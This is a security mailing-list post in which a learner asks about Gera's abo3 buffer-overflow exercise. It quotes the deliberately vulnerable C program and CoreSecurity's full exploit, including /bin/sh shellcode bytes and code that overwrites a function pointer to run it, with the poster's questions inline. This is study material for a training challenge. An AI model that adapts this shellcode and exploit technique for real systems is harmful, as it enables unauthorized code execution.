Abo3 (can someone help me?)

["Discussion Lists" <discussions () lagraphico com>]

Hi all,
This list has become far more interesting with the challenges.  Thanks
to all for the participation.  Recently, a user posted a particular
site:


http://community.core-sdi.com/~gera/InsecureProgramming/abo3.html

Which has the following code:


/* abo3.c                                                    *
 * specially crafted to feed your brain by gera () core-sdi com */

/* This'll prepare you for The Next Step                     */

int main(int argv,char **argc) {
        extern system,puts; 
        void (*fn)(char*)=(void(*)(char*))&system;
        char buf[256];

        fn=(void(*)(char*))&puts;
        strcpy(buf,argc[1]);
        fn(argc[2]);
        exit(1);
}

The issue here is that there is an exit(1) at the end of the code.  So
even if you were to overwrite the return address, it would not matter
because there is no return (if I understand correctly).

The solution, according to this place:

http://www.core-sec.com/examples/core_vulnerabilities.pdf

is that we have to stick our shellcode in an environment variable, then
overwrite the address of that variable into the address of the fn()
function.  So they lay out the following code to do it (questions
in-line):

/*
** exp3.c
** Coded by CoreSecurity - info () core-sec com
**/

#include <string.h>
#include <uninstd.h>

#define BUFSIZE 261

/* Why 261?  THe vulnerable program allocates 256 I thought.  Where is
that other 5 going to/for? */

/* 24 bytes shellcode */
char shellcode[]=
        /*  1       P    h  \   \   s   h    h  \   b    i  */
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
        /* n           P  2                */
        "\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
/* so it is pushing /bin/sh backwards on the stack.  Aleph1 talks about
how to create this code so I won't ask about it*/
int main(void) {
        char *env[3] = {shellcode, NULL};
        char evil_buffer[BUFFSIZE];
        char *p;

        /*Calculating address of shellcode */
        int ret = 0xbffffffa - strlen(shellcode) -
strlen("/home/user/gera/abo3");
/* That is what I don't get.  First, what is the 0xbffffffa address?  Is
that where supposedly the 
ending address of the code when everything is pushed onto the stack?  I
believe strlen calculates the 
length of a string?  If that is the case, why do they need to calculate
shellcode, and the path.  I 
also assume the path is case specific.  In other words, if the binary
has a different path on my system, 
I would use that instead. */

        /* constructing the buffer */
        p = evil_buffer;
        memset(p, 'B', 256);    // Some junk
        p += 256;

        *((void **)p) = (void *) (ret);
        p += 4;
        *p = '\0';

        /* Two arguments are passed to the vulnerable program */
        execle("/home/user/gera/abo3", "abo3", evil_buffer, "A",
NULL,env);
__________________________________________
I don't completely understand much of that last part either, but I have
the K&R book, so I will drag it out and see what I can find out.